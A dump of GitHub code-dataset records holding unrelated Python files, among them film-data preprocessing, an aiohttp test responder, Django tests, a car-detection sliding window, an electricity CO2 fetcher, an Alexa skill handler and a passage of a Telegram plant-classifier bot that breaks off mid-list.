\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/move-zeroes.py","file_name":"move-zeroes.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"14116941093","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 30 06:46:53 2019\n@author: rian-van-den-ander\n\"\"\"\n\n# ---- IMPORTS AND INPUTS -----\n\nimport numpy as np\nimport pandas as pd\nfrom encode_json_column import encode_json_column\nfrom datetime import datetime\n\n# Importing the dataset\ndataset = pd.read_csv('tmdb_5000_movies.csv')\ndataset_credits = pd.read_csv('tmdb_5000_credits.csv')\ndataset = pd.concat([dataset, dataset_credits], axis=1)\n\n# meaning out 0 budgets - there are a lot, so this is better than removing the rows\ndataset['budget']=dataset['budget'].replace(0,dataset['budget'].mean())\n\nX = dataset.iloc[:, :].values\ny_revenue = dataset.iloc[:, 12].values\ny_rating = dataset.iloc[:, 18].values\n\n\n# picking independent variables\nX = X[:,[0,1,4,9,11,13,14,15,22,23]]\n\n# Removing zero REVENUES from the data - revenue is super important\n# I could (and have) adjusted for inflation, but it made scant difference to model performance\ny_revenue_removed = []\ny_rating_removed = []\nX_removed = []\nfor l in range(0,len(y_revenue)):\n if y_revenue[l] !=0:\n y_revenue_removed.append(y_revenue[l])\n y_rating_removed.append(y_rating[l])\n X_removed.append(X[l])\ny_revenue = np.array(y_revenue_removed)\ny_rating = np.array(y_rating_removed)\nX = np.array(X_removed)\n\n# Ajusting inflation to 2019 at average inflation - 3.22%\n# do this only if using revenue (12 y index)\navg_inflation = 1.01322\nyear_now = 2019\nfor l in range(0,len(y_revenue)):\n try:\n film_year = int(X[l,4][0:4])\n y_revenue[l] = y_revenue[l]*(avg_inflation ** (year_now-film_year))\n X[l,7] = int(film_year)\n except:\n X[l,4] = 0\n\n# converting film date to day of year\n# i am arguably losing the 'year' which might be slightly correlated with film success\n# but that opens up a whole new can of worms about ratings and revenues by year\nfor l in range(0,len(y_revenue)):\n film_date = X[l,4]\n try:\n datetime_object = datetime.strptime(film_date, '%Y-%m-%d')\n X[l,4] = datetime_object.timetuple().tm_yday\n except:\n X[l,4] = 0\n\ndataset = pd.DataFrame(X)\n\n# encoding genres. \n# using name because \"id\" overlaps with \"id\" in the next encoding, and so on\ndataset = encode_json_column(dataset, 1,\"name\")\n\n# encoding keywords\n# limiting to 100 codes, and removing anything not within those 100\n# yes, it is column 1 now, since last column 1 was removed by previous encoding\ndataset = encode_json_column(dataset, 1, \"name\", 500, 1) #was 100\n\n# encoding production companies.\n# limiting to 100 codes, and removing anything not within those 100\ndataset = encode_json_column(dataset, 1,\"name\", 500, 1) #was 100\n\n# encoding all spoken languages\ndataset = encode_json_column(dataset, 3,\"iso_639_1\")\n\n# encoding cast\n# encoding 'just' top 500 cast\ndataset = encode_json_column(dataset, 4,\"name\", 5000, 1) #was 500\n\n# encoding crew\n# encoding 'just' top 500 cast\ndataset = encode_json_column(dataset, 4,\"name\", 5000, 1) #was 500\n\n#saving to CSVs as a checkpoint to be used in regressors\ndataset.to_csv(r'Encoded_X.csv')\ndataset_y_revenue = pd.DataFrame(y_revenue)\ndataset_y_revenue.to_csv(r'Encoded_y - revenue.csv')\ndataset_y_rating = pd.DataFrame(y_rating)\ndataset_y_rating.to_csv(r'Encoded_y - rating.csv')","repo_name":"ryan-anderson-ds/explorations","sub_path":"film_success/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39510296298","text":"import dataclasses as dc\nfrom contextlib import asynccontextmanager\nfrom json.decoder import JSONDecodeError\nfrom typing import Any, AsyncIterator, Awaitable, Callable, Dict, List, Optional, Union\nfrom typing_extensions import Literal\n\nfrom aiohttp import web\n\nMethod = Union[Literal[\"get\"], Literal[\"post\"], Literal[\"delete\"]]\nMETHODS = (\"get\", \"post\", \"delete\")\n\n\nclass ResponderException(Exception):\n pass\n\n\nclass InvalidPathException(ResponderException):\n pass\n\n\nclass BindAddressException(ResponderException):\n pass\n\n\nHandler = Callable[[web.Request], Awaitable[web.StreamResponse]]\n\n\n@dc.dataclass\nclass TrackedRequest:\n method: str\n path: str\n valid: bool\n headers: Dict\n query: Dict\n json: Optional[Dict]\n\n\nclass RequestTracker:\n calls: List[TrackedRequest]\n expected_method: str\n expected_path: str\n\n def __init__(\n self: \"RequestTracker\", expected_path: str, expected_method: str\n ) -> None:\n self.calls = []\n self.expected_method = expected_method.lower()\n self.expected_path = expected_path\n\n @property\n def invalid_calls(self: \"RequestTracker\") -> List[TrackedRequest]:\n return [tr for tr in self.calls if not tr.valid]\n\n async def add(self: \"RequestTracker\", request: web.Request) -> None:\n valid = (\n request.method.lower() == self.expected_method\n and request.path == self.expected_path\n )\n try:\n json = await request.json()\n except JSONDecodeError:\n json = None\n\n self.calls.append(\n TrackedRequest(\n method=request.method.lower(),\n path=request.path,\n valid=valid,\n headers=dict(request.headers),\n query=dict(request.query),\n json=json,\n )\n )\n\n\n@asynccontextmanager\nasync def respond(\n *,\n json: Optional[Any] = None,\n body: Optional[Any] = None,\n text: Optional[str] = None,\n method: Method = \"get\",\n path: str = \"/\",\n status_code: int = 200,\n port: int = 5000,\n) -> AsyncIterator[RequestTracker]:\n if method.lower() not in METHODS:\n raise ValueError(f'\"{method}\" method isn\\'t supported')\n arg_count = sum(param is not None for param in (json, body, text))\n if arg_count != 1:\n raise ValueError(\"You need to provide only one of `json`, `body` or `text`\")\n\n # Set up temporary view\n async def view(request: web.Request) -> web.Response:\n if json is not None:\n return web.json_response(json, status=status_code)\n return web.Response(body=body, text=text, status=status_code)\n\n # Handle invalid paths\n request_tracker = RequestTracker(expected_method=method, expected_path=path)\n\n @web.middleware\n async def track_requests(\n request: web.Request, handler: Handler\n ) -> web.StreamResponse:\n # request_tracker.add.append((request.method.lower(), request.path))\n await request_tracker.add(request)\n return await handler(request)\n\n app = web.Application(middlewares=[track_requests])\n app.add_routes([getattr(web, method.lower())(path, view)])\n\n # Set up async runner\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, \"localhost\", port)\n try:\n await site.start()\n except OSError as e:\n raise BindAddressException(f\"Unable to bind address: {e.strerror}\") from e\n\n # Yield and then cleanup\n try:\n yield request_tracker\n finally:\n await runner.cleanup()\n\n # Make sure no requests were made to invalid paths\n if request_tracker.invalid_calls:\n invalid_call = request_tracker.invalid_calls[0]\n raise InvalidPathException(\n f'Invalid {invalid_call.method.upper()} request made to \"{invalid_call.path}\"'\n )\n","repo_name":"ikornaselur/local-responder","sub_path":"src/local_responder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26511285514","text":"\"\"\"\nTests related specifically to integration with Morango.\n\"\"\"\nimport os\nimport unittest\n\nfrom django.test import TestCase\nfrom morango.controller import MorangoProfileController\nfrom morango.models import InstanceIDModel, Store\n\nfrom ..models import Facility, FacilityDataset, FacilityUser\n\n\nclass FacilityDatasetCertificateTestCase(TestCase):\n\n def test_creating_facility_creates_dataset(self):\n facility = Facility.objects.create(name=\"hallo\")\n self.assertIsNotNone(facility.dataset)\n\n def test_creating_facilitydataset_creates_certificate(self):\n dataset = FacilityDataset.objects.create()\n self.assertIsNotNone(dataset.get_root_certificate())\n\n def test_partition_and_id_values(self):\n facility = Facility.objects.create(name=\"hallo\")\n dataset_id = facility.dataset.id\n self.assertEqual(dataset_id, facility.dataset.get_root_certificate().id)\n self.assertEqual(dataset_id, facility.dataset._morango_source_id)\n self.assertTrue(facility.dataset._morango_partition.startswith(dataset_id))\n scope = facility.dataset.get_root_certificate().get_scope()\n for partition in scope.read_filter + scope.write_filter:\n self.assertTrue(partition.startswith(dataset_id))\n\n\nclass DateTimeTZFieldTestCase(TestCase):\n\n def setUp(self):\n self.controller = MorangoProfileController('facilitydata')\n InstanceIDModel.get_or_create_current_instance()\n\n @unittest.skipIf(os.environ.get('TOX_ENV') == 'postgres', \"Skipping testing on postgres because sql is not compatible.\")\n def test_deserializing_field(self):\n facility = Facility.objects.create(name=\"hallo\")\n FacilityUser.objects.create(username='jamie', facility=facility)\n self.controller.serialize_into_store()\n Store.objects.update(dirty_bit=True)\n try:\n self.controller.deserialize_from_store()\n except AttributeError as e:\n self.fail(e.message)\n","repo_name":"pnija/debian-installer","sub_path":"debian/kolibri/usr/lib/python3/dist-packages/kolibri/auth/test/test_morango_integration.py","file_name":"test_morango_integration.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"425478684","text":"from HOG_Processor import HOGExtractor\n\nimport numpy as np\nimport cv2 as cv\nimport pickle\nimport matplotlib.pyplot as plt\n\nclass CarFinder:\n\n\n def __init__(self, hogExtractor, svm, windowSize, slide_step):\n \"\"\"\n\n :param hogExtractor: the given hog extractor\n :param svm: support vector machine for classification, either linear SVC or SVC\n :param windowSize: size of the sliding winodw\n :param slide_step: number of pixel to move per sliding window\n \"\"\"\n self.slide_step = slide_step\n self.svm = svm\n self.hogExtractor = hogExtractor\n self.windowSize = windowSize\n self.detected_window = None\n self.detected_car = None\n\n\n def find_car(self, file_name, mode):\n \"\"\"\n\n :param file_name: file to the test image\n :param mode: : LinearSvc or SVC\n \"\"\"\n img = cv.imread(file_name)\n\n windowSizeX = self.windowSize\n windowSizeY = self.windowSize\n\n valid_windows = []\n valid_image= []\n\n for bottom_left_x in range(windowSizeX, img.shape[1], self.slide_step):\n for bottom_left_y in range(windowSizeY, img.shape[0], self.slide_step):\n\n x = (bottom_left_x - windowSizeX, bottom_left_x)\n y = (bottom_left_y - windowSizeY, bottom_left_y)\n\n if self.window_classfy( x, y, img, mode):\n valid_windows.append([x[0], x[1], y[0], y[1]])\n box_img = np.copy(img)[y[0]:y[1], x[0]:x[1], :]\n valid_image.append(box_img)\n\n self.detected_window = valid_windows\n\n with open(\"HogData/validWindows_\" + mode + '.pickle', 'wb') as handle:\n pickle.dump(valid_windows, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n num = 0\n for i in valid_image:\n cv.imwrite('results/' + str(num) + '.jpg', i)\n num += 1\n\n\n def window_classfy(self, x, y, img, mode):\n \"\"\"\n\n :param x: top left corner coordinate\n :param y: bottom right corner coordinate\n :param img: test image\n :param mode: LinearSVC or SVC\n :return:\n \"\"\"\n img = np.copy(img)[y[0]:y[1], x[0]:x[1], :]\n\n return self.svm.classify(img, mode)\n\n\n def find_group(self, file_name, data_file):\n \"\"\"\n\n :param file_name: path to the test image\n :param data_file: path to the stored detection data\n :return:\n \"\"\"\n img = cv.imread(file_name)\n\n with open(data_file, 'rb') as handle:\n validWindows = pickle.load(handle)\n\n print(validWindows)\n clusters = []\n for rect in validWindows:\n matched = 0\n for cluster in clusters:\n if (rect[0] <= cluster[1] and cluster[0] <= rect[1]\n and rect[2] <= cluster[3] and cluster[2] <= rect[3]):\n matched = 1\n cluster[0] = min(cluster[0], rect[0])\n cluster[1] = max(cluster[1], rect[1])\n cluster[2] = min(cluster[2], rect[2])\n cluster[3] = max(cluster[3], rect[3])\n cluster[4] += 1\n\n if not matched:\n\n rect.append(1)\n clusters.append(rect)\n\n detected = []\n final_clusters = []\n\n for cluster in clusters:\n if cluster[4] > 3:\n image = np.copy(img)[cluster[2]:cluster[3], cluster[0]:cluster[1],:]\n detected.append(image)\n final_clusters.append(cluster)\n\n return final_clusters, detected\n\n","repo_name":"EASONGUAN/DetectAndRecognize","sub_path":"Sliding_Window.py","file_name":"Sliding_Window.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35388683682","text":"from fungsi_parser import parser_tanggal\n\ndef validate_date(arr):\n #konfirmasi date harus DD/MM/YYYY\n if len(str(arr[0])) !=2 or len(str(arr[1])) !=2:\n print(\">>> Tanggal harus dalam format DD/MM/YYYY!\")\n return False\n elif(len(str(arr[2]))) != 4:\n print(\">>> Tanggal harus dalam format DD/MM/YYYY\")\n return False\n #ubah tanggal ke integer\n for j in range(len(arr)):\n arr[j] = int(arr[j])\n kabisat = False\n if ((arr[2] % 4 == 0) and (arr[2] % 100 != 0)) or (arr[2] % 4 == 0):\n kabisat = True\n if kabisat:\n if arr[1] == 2:\n if 1 <= arr[0] <= 29:\n return True\n else:\n return False\n else:\n if arr[1] == 2:\n if 1 <= arr[0] <= 28:\n return True\n else:\n return False\n if ((arr[1] == 1) or (arr[1] == 3) or (arr[1] == 5) or (arr[1] == 7) or (arr[1] == 8) or (arr[1] == 10) or (arr[1] == 12)) and (1 <= arr[0] <= 31):\n return True\n elif ((arr[1] == 4) or (arr[1] == 6) or (arr[1] == 9) or (arr[1] == 11)) and (1 <= arr[0] <= 30):\n return True\n else:\n return False","repo_name":"Adityapnn811/Program-Inventaris-Doremonangis","sub_path":"validate_tanggal.py","file_name":"validate_tanggal.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19845791008","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom http import HTTPStatus\nfrom django.core.cache import cache\n\nfrom posts.models import Group, Post\n\nUser = get_user_model()\n\n\nclass PostsURLTests(TestCase):\n AUTHOR_NAME = 'author'\n ANOTHER_NAME = 'not_author'\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username=cls.AUTHOR_NAME)\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание'\n )\n cls.post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=cls.user,\n group=cls.group,\n )\n cls.available_urls = (\n '/',\n '/group/test-slug/',\n f'/profile/{cls.AUTHOR_NAME}/',\n f'/posts/{cls.post.id}/',\n )\n cls.templates_url_names = {\n '/': 'posts/index.html',\n f'/profile/{cls.AUTHOR_NAME}/': 'posts/profile.html',\n '/group/test-slug/': 'posts/group_list.html',\n '/create/': 'posts/create.html',\n f'/posts/{cls.post.id}/': 'posts/post_detail.html',\n f'/posts/{cls.post.id}/edit/': 'posts/create.html',\n '/unexisting_page/': 'core/404.html',\n '/follow/': 'posts/follow.html',\n }\n\n def setUp(self):\n self.guest_client = Client()\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.another_user = User.objects.create_user(\n username=self.ANOTHER_NAME)\n self.another_client = Client()\n self.another_client.force_login(self.another_user)\n cache.clear()\n\n def test_pages_is_available_any_user(self):\n \"\"\"Страницы доступны для любому пользователю\n /, /group//, /profile//, /posts//\n \"\"\"\n for url in self.available_urls:\n with self.subTest(url=url):\n response = self.guest_client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_urls_uses_correct_template(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n for url, template in self.templates_url_names.items():\n with self.subTest(url=url):\n response = self.authorized_client.get(url)\n self.assertTemplateUsed(response, template)\n\n def test_page_redirect_anonymous_on_admin_login(self):\n \"\"\"Страница /create/ перенаправит анонимного пользователя\n на страницу логина.\n \"\"\"\n response = self.guest_client.get('/create/', follow=True)\n self.assertRedirects(response, '/auth/login/?next=/create/')\n\n def test_page_authorized_user_create_post(self):\n \"\"\"Страница /create/ доступна для авторизованному пользователю\"\"\"\n response = self.authorized_client.get('/create/')\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_page_author_edit_post(self):\n \"\"\"Страница /posts//edit/ доступна для автора\"\"\"\n response = self.authorized_client.get(\n f'/posts/{self.post.id}/edit/')\n self.assertEqual(\n self.post.author.get_username(),\n self.user.username)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_page_not_author_not_can_edit_post(self):\n \"\"\"Страница /posts//edit/ не доступна\n для авторизованному пользователю НЕ автору\"\"\"\n response = self.another_client.get(f'/posts/{self.post.id}/edit/')\n self.assertNotEqual(\n self.post.author.get_username(),\n self.another_user.username)\n self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)\n\n def test_unexisting_pages(self):\n \"\"\"Страницы /unexisting_page/ (несуществующую страницу)\n для любому пользователю\"\"\"\n response = self.guest_client.get('/unexisting_page/')\n self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)\n","repo_name":"AndreyZyuzin/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18705777120","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 13 14:44:22 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n#import requests\r\nurl = 'http://www.perseus.tufts.edu/hopper/xmlchunk?doc=Perseus%3Atext%3A1999.01.0134%3Abook%3D1%3Acard%3D1'\r\n\r\nresponse = requests.get(url)\r\n\r\nif not response.ok:\r\n response.raise_for_status()\r\n \r\nfile = open('iliad-perseus.xml', 'wb')\r\nfile.write(response.content)\r\nfile.close()\r\n\r\nfrom xml.etree import ElementTree as ET\r\n\r\ndoc = ET.parse('iliad-perseus.xml').getroot()\r\n\r\nchaps = doc.findall('.//div1[@type=\"chapter\"]')\r\nprint(\"Found\", len(chaps), \"chapters.\")\r\n\r\nplaintext = []\r\n\r\nfor chap in chaps:\r\n for note in chap.findall('note'):\r\n chap.remove(note)\r\n \r\n this_text= ' '. join(chap.itertext())\r\n plaintext.append(this_text)\r\n \r\niliad = ' '.join(plaintext)\r\n\r\nprint(len(iliad))","repo_name":"amkaminski/PersonalProjects-LogosEndiathetos","sub_path":"Illiad_Reader/iliadPerseus.py","file_name":"iliadPerseus.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22342721748","text":"import platform\n\nimport pytest\n\nfrom framework.utils import wait_process_termination\n\n\n@pytest.mark.skipif(\n platform.machine() != \"aarch64\",\n reason=\"The error code returned on aarch64 will not be returned on x86 \"\n \"under the same conditions.\",\n)\ndef test_enosys_error_code(uvm_plain):\n \"\"\"\n Test that ENOSYS error is caught and firecracker exits gracefully.\n \"\"\"\n # On aarch64 we trigger this error by running a C program that\n # maps a file into memory and then tries to load the content from an\n # offset in the file bigger than its length into a register asm volatile\n # (\"ldr %0, [%1], 4\" : \"=r\" (ret), \"+r\" (buf));\n vm = uvm_plain\n vm.spawn()\n vm.memory_monitor = None\n vm.basic_config(\n vcpu_count=1,\n boot_args=\"reboot=k panic=1 pci=off init=/usr/local/bin/devmemread\",\n )\n vm.start()\n\n # Check if FC process is closed\n wait_process_termination(vm.firecracker_pid)\n\n vm.check_log_message(\n \"Received ENOSYS error because KVM failed to emulate an instruction.\"\n )\n vm.check_log_message(\"Vmm is stopping.\")\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/functional/test_error_code.py","file_name":"test_error_code.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"14315481877","text":"import os\nimport collections\nimport requests\nimport pandas as pd\n\nelectricitymap_token = os.getenv(\"AUTH_ELECTRICITYMAP\")\n\n\ndef get_data(zones):\n data = []\n countries = pd.unique(zones[\"country\"])\n for country in countries:\n zones_of_country = zones[zones[\"country\"] == country]\n ids = pd.unique(zones_of_country[\"zone_id\"])\n country_co2_levels_raw = []\n country_consumption_total = []\n country_co2_levels_cleaned = []\n mix = {}\n # CO2\n for id in ids:\n res = requests.get(\n f\"https://api.electricitymap.org/v3/power-breakdown/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n country_consumption_total.append(\n sum(res.get(\"powerConsumptionBreakdown\").values())\n )\n co2 = requests.get(\n f\"https://api.electricitymap.org/v3/carbon-intensity/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n country_co2_levels_raw.append(co2.get(\"carbonIntensity\"))\n # Mix\n mix_res = requests.get(\n f\"https://api.electricitymap.org/v3/power-breakdown/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n production = mix_res.get(\"powerConsumptionBreakdown\")\n for key, value in production.items():\n mix[key] = mix.get(key, 0) + value\n # Top 3 mix\n tuples = collections.Counter(mix).most_common(3)\n top3 = []\n for tuple in tuples:\n top3.append(\n tuple + (str(round(tuple[1] / sum(country_consumption_total) * 100)),)\n )\n for co2_level, production_level in zip(\n country_co2_levels_raw, country_consumption_total\n ):\n country_co2_levels_cleaned.append(co2_level * production_level)\n co2 = round(sum(country_co2_levels_cleaned) / sum(country_consumption_total))\n data.append({\"country\": country, \"co2\": co2, \"mix\": mix, \"top3\": top3})\n return data\n","repo_name":"Robin-C/electricitymap_twitter","sub_path":"scripts/utils/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73098240487","text":"# ---------- Import ----------\nfrom collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nN, M = map(int, input().split())\nID_PW = defaultdict()\n\nfor _ in range(N):\n ID, PW = map(str, input().rstrip().split())\n ID_PW[ID] = PW\n \nfor _ in range(M):\n print(ID_PW[input().rstrip()])","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_17219..py","file_name":"acmicpc_17219..py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23331810425","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n length = len(sys.argv) - 1\n if length == 0:\n txt = \".\"\n else:\n txt = \":\"\n\n if length == 1:\n txt2 = \"\"\n else:\n txt2 = \"s\"\n print(\"{} argument{}{}\".format(length, txt2, txt))\n for i in range(1, length + 1):\n print(\"{}: {}\".format(i, sys.argv[i]))\n","repo_name":"mateog91/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20314192744","text":"\"\"\"\nSimple Python Lambda service that uses a simplified my_py.py file to provide simple\nresponses to simple \"fact\"-like intents. The example my_py.py with this repo supports\nthe following:\n\nIntents supported:\n\n Custom:\n About\n Contact\n Upcoming\n\n Required:\n LaunchRequest (request type that calls launch function in my_py)\n AMAZON.HelpIntent (intent that calls help function in my_py)\n AMAZON.CancelIntent or AMAZON.StopIntent (intent, both use end function in my_py)\n\nNote, that as long as you keep your intents in sync with your skill intentSchema, you can\nsimply update or add intents as functions to the my_py.py and the lambda service will use them.\nIntents in your Schema may be mixed case -- this code will convert to lower case.\n\nFurthermore, using this template will make it easier to make an external API call or DB call\nto form the response. If you want to stick to simply updating text, you can try out the S3\nbranch where you can update the responses in a JSON file (no code).\n\nFurther note, there is .travis.yml in this repo that does two things:\n 1) Deploys this code to your configured lambda function.\n 2) Deploys the ../responses/response.json to your bucket.\n\nIf you fork this repo or create your own copy and keep it as a public repo, you can use\nTravis to deploy to your lambda. You'll want to change the following configs:\n\n in deploy-provider: lambda\n function_name\n role\n access_key_id (available from AWS console)\n secret_access_key (also available from AWS console, but make sure you use travis command\n line to encrypt your key)\n\n\n\"\"\"\n\nimport logging\nimport my_py\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'SSML',\n 'ssml': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': title,\n 'content': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# Function which delegates the speech output for the response based on the JSON file.\n# Simply looking up the intent in the responses map created from the parsed JSON.\n#\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n logger.info(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n session_attributes = {} # No session attributes needed for simple fact response\n reprompt_text = None # No reprompt text set\n speech_output = \"\"\n should_end_session = True # Can end session after fact is returned (no additional dialogue)\n\n if intent_name == \"launch\":\n should_end_session = False # Opening a skill requires the session remain open\n elif intent_name == \"AMAZON.HelpIntent\":\n should_end_session = False # Asking for help requires the session remain open\n intent_name = 'help'\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n intent_name = 'end'\n else:\n intent_name = intent_name.lower()\n\n # Grab the response specified for the given intent of the JSON by calling\n # the function defined in my_py\n speech_output = getattr(my_py,intent_name)()\n\n return build_response(session_attributes, build_speechlet_response\n (intent_name,speech_output,reprompt_text,should_end_session))\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n logger.info(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n # I am injecting a new \"intent\" type of launch in order to\n # allow my_py to provide the response text for a LaunchRequest\n if event['request']['type'] == \"LaunchRequest\":\n event['request']['intent'] = { 'name':'launch' }\n \n return on_intent(event['request'], event['session'])\n\n","repo_name":"cherie1/cherie_skill","sub_path":"src/alexa_py.py","file_name":"alexa_py.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27745435996","text":"import telebot\r\nimport time\r\nimport os\r\nimport keras\r\nfrom keras.models import load_model\r\nimport cv2\r\nfrom PIL import Image\r\nimport imageio\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\nfrom keras.applications.mobilenet import preprocess_input\r\n\r\ntoken = \"-\" #(token removed)\r\nbot = telebot.TeleBot(token)\r\n\r\n\r\nmodel = load_model(\"W://bot/MobileNetV2_model_100ep.h5\")\r\nlabels = ['Abutilon_theophrasti', 'Acalypha_rhomboidea', 'Acer_negundo', 'Acer_rubrum', 'Acer_saccharinum',\r\n 'Acer_saccharum', 'Ageratina_altissima', 'Ailanthus_altissima', 'Alliaria_petiolata', 'Allium_cernuum',\r\n 'Allium_tricoccum', 'Amaranthus_spinosus', 'Ambrosia_artemisiifolia', 'Ambrosia_trifida',\r\n 'Amelanchier_arborea', 'Amphicarpa_bracteata', 'Apocynum_cannabinum', 'Arabis_laevigata', 'Artemisia_annua',\r\n 'Asarum_canadense', 'Asclepias_syriaca', 'Asimina_triloba', 'Asplenium_platyneuron', 'Aster_cordifolius',\r\n 'Aster_divaricatus', 'Boehmeria_cylindrica', 'Campsis_radicans', 'Carpinus_caroliniana', 'Carya_cordiformis',\r\n 'Carya_glabra', 'Catalpa_bignonioides', 'Celastrus_orbiculatus', 'Celtis_occidentalis',\r\n 'Cephalanthus_occidentalis', 'Cercis_canadensis', 'Chasmanthium_latifolium', 'Chionanthus_virginicus',\r\n 'Circaea_lutetiana', 'Collinsonia_canadensis', 'Commelina_communis', 'Conium_maculatum', 'Corydalis_flavula',\r\n 'Crataegus_crus-galli', 'Cunila_origanoides', 'Cynanchum_laeve', 'Datura_stramonium', 'Daucus_carota',\r\n 'Desmodium_glabellum', 'Dicentra_canadensis', 'Dichanthelium_acuminatum_var._fasciculatum',\r\n 'Dichanthelium_boscii', 'Dichanthelium_clandestinum', 'Dioscorea_villosa', 'Diospyros_virginiana',\r\n 'Dipsacus_sylvestris', 'Dirca_palustris', 'Dryopteris_marginalis', 'Duchesnea_indica', 'Erigenia_bulbosa',\r\n 'Erigeron_annuus', 'Erysimum_cheiranthoides', 'Erythronium_americanum', 'Euonymus_americanus',\r\n 'Eupatorium_coelestinum', 'Eupatorium_purpureum', 'Eupatorium_serotinum', 'Euphorbia_maculata',\r\n 'Fraxinus_americana', 'Galium_aparine', 'Geum_canadense', 'Glechoma_hederacea', 'Gleditsia_triacanthos',\r\n 'Hamamelis_virginiana', 'Heliopsis_helianthoides', 'Hesperis_matronalis', 'Hibiscus_laevis',\r\n 'Houstonia_purpurea', 'Humulus_japonicus', 'Hydrophyllum_canadense', 'Hydrophyllum_virginianum',\r\n 'Hypericum_mutilum', 'Hypericum_prolificum', 'Hypericum_punctatum', 'Ilex_opaca', 'Impatiens_capensis',\r\n 'Ipomoea_lacunosa', 'Ipomoea_pandurata', 'Jeffersonia_diphylla', 'Juglans_nigra', 'Juncus_tenuis',\r\n 'Justicia_americana', 'Lamium_purpureum', 'Laportea_canadensis', 'Lespedeza_procumbens', 'Ligustrum_vulgare',\r\n 'Lindera_benzoin', 'Lindernia_dubia', 'Liriodendron_tulipifera', 'Lonicera_japonica', 